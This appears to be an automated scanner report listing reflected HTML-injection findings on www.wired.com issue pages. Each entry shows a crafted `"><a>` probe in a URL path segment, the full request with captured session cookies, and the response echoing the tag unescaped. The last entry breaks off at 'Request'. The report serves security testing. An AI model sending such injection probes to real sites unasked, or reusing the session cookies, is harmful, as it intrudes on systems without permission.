HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29353 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:10:02 GMT Date: Mon, 22 Nov 2010 01:06:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_16-0225886"><a>49703bfc46d"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e9dc"><a>6371e337d69 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue1e9dc"><a>6371e337d69/16-03/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29353 Vary: Accept-Encoding Cache-Control: max-age=236 Expires: Mon, 22 Nov 2010 01:08:58 GMT Date: Mon, 22 Nov 2010 01:05:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue1e9dc"><a>6371e337d69 c_16-03"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0de6"><a>6137b71f920 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/16-03b0de6"><a>6137b71f920/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29353 Vary: Accept-Encoding Cache-Control: max-age=219 Expires: Mon, 22 Nov 2010 01:09:26 GMT Date: Mon, 22 Nov 2010 01:05:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_16-03b0de6"><a>6137b71f920"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37019"><a>e9e4b1f3822 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue37019"><a>e9e4b1f3822/16-04/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29353 Vary: Accept-Encoding Cache-Control: max-age=225 Expires: Mon, 22 Nov 2010 01:08:48 GMT Date: Mon, 22 Nov 2010 01:05:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue37019"><a>e9e4b1f3822 c_16-04"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4f74"><a>652de2d69ff was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/16-04b4f74"><a>652de2d69ff/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29353 Vary: Accept-Encoding Cache-Control: max-age=237 Expires: Mon, 22 Nov 2010 01:09:51 GMT Date: Mon, 22 Nov 2010 01:05:54 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_16-04b4f74"><a>652de2d69ff"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8725"><a>8420d93529b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issuec8725"><a>8420d93529b/16-05/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29353 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:09:03 GMT Date: Mon, 22 Nov 2010 01:05:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issuec8725"><a>8420d93529b c_16-05"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7284"><a>f4e7c102648 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/16-05d7284"><a>f4e7c102648/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29353 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:09:56 GMT Date: Mon, 22 Nov 2010 01:05:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_16-05d7284"><a>f4e7c102648"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f50eb"><a>0f522718632 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issuef50eb"><a>0f522718632/16-06 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=230 Expires: Mon, 22 Nov 2010 01:08:35 GMT Date: Mon, 22 Nov 2010 01:04:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issuef50eb"><a>0f522718632 c_16-06"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91af4"><a>0d0253827d5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/16-0691af4"><a>0d0253827d5 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:09:45 GMT Date: Mon, 22 Nov 2010 01:05:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_16-0691af4"><a>0d0253827d5"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dd8a"><a>96480a8cd6d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue9dd8a"><a>96480a8cd6d/16-07 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=220 Expires: Mon, 22 Nov 2010 01:08:24 GMT Date: Mon, 22 Nov 2010 01:04:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue9dd8a"><a>96480a8cd6d c_16-07"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1f17"><a>1afdb79e6a5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/16-07e1f17"><a>1afdb79e6a5 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:09:33 GMT Date: Mon, 22 Nov 2010 01:05:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_16-07e1f17"><a>1afdb79e6a5"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff591"><a>46f679cbbb3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issueff591"><a>46f679cbbb3/16-08 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=219 Expires: Mon, 22 Nov 2010 01:08:07 GMT Date: Mon, 22 Nov 2010 01:04:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issueff591"><a>46f679cbbb3 c_16-08"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6d50"><a>2ace45fa09d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/16-08e6d50"><a>2ace45fa09d HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:09:28 GMT Date: Mon, 22 Nov 2010 01:05:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_16-08e6d50"><a>2ace45fa09d"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c954"><a>36a920c6495 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue8c954"><a>36a920c6495/16-09 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=219 Expires: Mon, 22 Nov 2010 01:06:17 GMT Date: Mon, 22 Nov 2010 01:02:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue8c954"><a>36a920c6495 c_16-09"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43bb9"><a>b0f9cc9a179 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/16-0943bb9"><a>b0f9cc9a179 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=226 Expires: Mon, 22 Nov 2010 01:07:15 GMT Date: Mon, 22 Nov 2010 01:03:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_16-0943bb9"><a>b0f9cc9a179"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c841a"><a>4d579212ed5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issuec841a"><a>4d579212ed5/16-10 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=238 Expires: Mon, 22 Nov 2010 01:06:35 GMT Date: Mon, 22 Nov 2010 01:02:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issuec841a"><a>4d579212ed5 c_16-10"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d02f"><a>4a9c57581a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue/16-103d02f"><a>4a9c57581a HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29350 Vary: Accept-Encoding Cache-Control: max-age=226 Expires: Mon, 22 Nov 2010 01:07:10 GMT Date: Mon, 22 Nov 2010 01:03:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue c_16-103d02f"><a>4a9c57581a"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56a69"><a>5ad80dfb3b7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/issue56a69"><a>5ad80dfb3b7/16-11 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:06:32 GMT Date: Mon, 22 Nov 2010 01:02:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_issue56a69"><a>5ad80dfb3b7 c_16-11"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8228f"><a>340cdb6273d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
